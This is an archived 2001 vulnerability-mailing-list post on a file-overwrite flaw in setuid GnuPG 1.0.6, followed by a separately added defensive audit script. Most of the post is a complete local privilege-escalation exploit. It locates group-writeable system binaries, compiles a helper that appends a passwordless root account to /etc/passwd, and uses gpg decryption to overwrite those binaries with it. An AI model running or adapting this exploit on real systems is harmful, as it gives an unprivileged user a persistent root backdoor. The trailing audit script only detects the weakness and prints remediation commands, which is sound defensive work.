Vulnerability Development mailing list archives

Possible problem with GnuPG 1.0.6


From: Przemyslaw Frasunek <venglin () freebsd lublin pl>
Date: Sat, 29 Dec 2001 09:59:06 +0100

Hello,

I've just found strange behaviour in GnuPG 1.0.6 when installed setuid
(the default on Mandrake, probably others?). When decrypting a file, it allows
overwriting any group-writeable file on the system.

It works for me on Mandrake 8.1, because a few system binaries are
installed group-writeable (especially smbmount and smbumount). Exploit
attached.

#!/bin/sh

# babcia padlina 2001
# especially for pcoa :)
#
# GnuPG when installed setuid allows overwriting any group-writable
# files.
#
# Tested on generic Mandrake 8.1
 
if [ ! -x /usr/bin/gpg -o ! -u /usr/bin/gpg ]; then
  echo "GnuPG not installed or not setuid."
  exit 1
fi

if [ ! -x /usr/bin/gcc ]; then
  echo "gcc not installed."
  exit 1
fi

echo "Looking for group-writeable binaries..."
echo

BINS=`/usr/bin/find /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /usr/X11R6/bin -type f -perm -0020 2>/dev/null`

if [ "X$BINS" != "X" ]; then
  echo "$BINS"
else
  echo "Sorry, this system is not exploitable."
  exit 1
fi

echo
echo "Compiling helper binary..."
echo

cat > own.c << __EOF__
main() { if (!getuid()) { system("echo \"babunia::0:0::/:/bin/sh\" >> /etc/passwd"); } }
__EOF__

/usr/bin/gcc -o own own.c > /dev/null 2>&1

if [ ! -x own ]; then
  echo "Compilation failed."
  exit 1
fi

rm -f own.c

echo "Overwriting binaries... Please confirm each one."
echo

for i in $BINS; do
  rm -f own.gpg
  echo owned | gpg --passphrase-fd 0 -c own
  echo owned | gpg --passphrase-fd 0 -o $i own.gpg
done

rm -f own own.gpg

echo
echo "Looks like everything is done. When root will run any of above"
echo "binaries, user babunia will be added with root privs."

-- 
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw () frasunek com ** PGP: D48684904685DF43EA93AFA13BE170BF *
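An added audit check (not part of the original post and not GnuPG's own code) for the two conditions this report combines: a setuid/setgid gpg binary and group-writeable files under system binary directories. The function names, the gpg path argument and the directory list are assumptions; it only prints the remediation commands rather than running them.

```sh
#!/bin/sh
# Added audit example, not from the original post. Dry-run only: it reports
# findings and prints the chmod commands an administrator would apply.

# Return 0 if the given gpg binary carries the setuid or setgid bit, 1 otherwise.
# (Path is an argument because the install location is an assumption.)
gpg_is_privileged() {
  gpg_path="$1"
  [ -f "$gpg_path" ] || return 1
  [ -u "$gpg_path" ] || [ -g "$gpg_path" ]
}

# Print regular files with the group-write bit set under the given directories,
# one path per line. Directories that do not exist are skipped.
list_group_writeable() {
  for d in "$@"; do
    [ -d "$d" ] || continue
    find "$d" -type f -perm -0020 2>/dev/null
  done
}

# Run both checks. Exit status is the number of findings: 0 means clean,
# 2 means both conditions hold, which is the combination the report relies on.
audit_setuid_gpg() {
  gpg_path="$1"; shift
  findings=0
  if gpg_is_privileged "$gpg_path"; then
    echo "WARN: $gpg_path is setuid/setgid; remediation: chmod u-s,g-s $gpg_path"
    findings=$((findings + 1))
  fi
  writeable=$(list_group_writeable "$@")
  if [ -n "$writeable" ]; then
    echo "WARN: group-writeable files under system paths; remediation:"
    printf '%s\n' "$writeable" | sed 's/^/  chmod g-w /'
    findings=$((findings + 1))
  fi
  return "$findings"
}

# Typical invocation against the paths the report's script searches (assumed):
# audit_setuid_gpg /usr/bin/gpg /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin
```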

